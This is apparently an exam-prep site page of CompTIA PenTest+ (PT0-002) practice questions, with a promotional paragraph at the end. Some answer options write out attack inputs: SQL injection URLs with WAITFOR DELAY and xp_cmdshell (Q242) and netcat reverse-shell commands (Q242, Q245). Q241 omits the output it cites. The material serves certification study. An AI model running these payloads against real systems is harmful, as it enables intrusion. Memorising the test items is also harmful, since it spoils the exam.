PT0-002 Exam Details

  • Exam Code
    :PT0-002
  • Exam Name
    :CompTIA PenTest+
  • Certification
    :CompTIA Certifications
  • Vendor
    :CompTIA
  • Total Questions
    :455 Q&As
  • Last Updated
    :May 31, 2026

CompTIA PT0-002 Online Questions & Answers

  • Question 241:

    A penetration tester was brute forcing an internal web server and ran a command that produced the following output:

    However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile, a blank page was displayed. Which of the following is the MOST likely reason for the lack of output?

    A. The HTTP port is not open on the firewall.
    B. The tester did not run sudo before the command.
    C. The web server is using HTTPS instead of HTTP.
    D. This URI returned a server error.

  • Question 242:

    A penetration tester examines a web-based shopping catalog and discovers the following URL when viewing a product in the catalog:

    http://company.com/catalog.asp?productid=22

    The penetration tester alters the URL in the browser to the following and notices a delay when the page refreshes:

    http://company.com/catalog.asp?productid=22;WAITFOR DELAY'00:00:05'

    Which of the following should the penetration tester attempt NEXT?

    A. http://company.com/catalog.asp?productid=22:EXEC xp_cmdshell 'whoami'
    B. http://company.com/catalog.asp?productid=22' OR 1=1 -
    C. http://company.com/catalog.asp?productid=22' UNION SELECT 1,2,3 -
    D. http://company.com/catalog.asp?productid=22;nc 192.168.1.22 4444 -e /bin/bash

  • Question 243:

    An assessor wants to run an Nmap scan as quietly as possible. Which of the following commands will give the LEAST chance of detection?

    A. nmap -"T3 192.168.0.1
    B. nmap - "P0 192.168.0.1
    C. nmap - T0 192.168.0.1
    D. nmap - A 192.168.0.1

  • Question 244:

    During the reconnaissance phase, a penetration tester obtains the following output: Reply from 192.168.1.23: bytes=32 time<54ms TTL=128 Reply from 192.168.1.23: bytes=32 time<53ms TTL=128 Reply from 192.168.1.23: bytes=32 time<60ms TTL=128 Reply from 192.168.1.23: bytes=32 time<51ms TTL=128 Which of the following operating systems is MOST likely installed on the host?

    A. Linux
    B. NetBSD
    C. Windows
    D. macOS

  • Question 245:

    A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective?

    A. Create a one-shot system service to establish a reverse shell.
    B. Obtain /etc/shadow and brute force the root password.
    C. Run the nc -e /bin/sh command.
    D. Move laterally to create a user account on LDAP

  • Question 246:

    A penetration tester is trying to bypass an active response tool that blocks IP addresses that have more than 100 connections per minute.

    Which of the following commands would allow the tester to finish the test without being blocked?

    A. nmap -sU -p 1-1024 10.0.0.15
    B. nmap -p 22,25, 80, 3389 -T2 10.0.0.15 -Pn
    C. nmap -T5 -p 1-65535 -A 10.0.0.15
    D. nmap -T3 -F 10.0.0.15

  • Question 247:

    A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment.

    Which of the following could be used for a denial-of- service attack on the network segment?

    A. Smurf
    B. Ping flood
    C. Fraggle
    D. Ping of death

  • Question 248:

    Which of the following is the most secure way to protect a final report file when delivering the report to the client/customer?

    A. Creating a link on a cloud service and delivering it by email
    B. Asking for a PGP public key to encrypt the file
    C. Requiring FTPS security to download the file
    D. Copying the file on a USB drive and delivering it by postal mail

  • Question 249:

    A penetration tester is testing input validation on a search form that was discovered on a website.

    Which of the following characters is the BEST option to test the website for vulnerabilities?

    A. Comma
    B. Double dash
    C. Single quote
    D. Semicolon

  • Question 250:

    A company hired a penetration tester to do a social-engineering test against its employees. Although the tester did not find any employees' phone numbers on the company's website, the tester has learned the complete phone catalog was published there a few months ago.

    In which of the following places should the penetration tester look FIRST for the employees' numbers?

    A. Web archive
    B. GitHub
    C. File metadata
    D. Underground forums

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your PT0-002 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.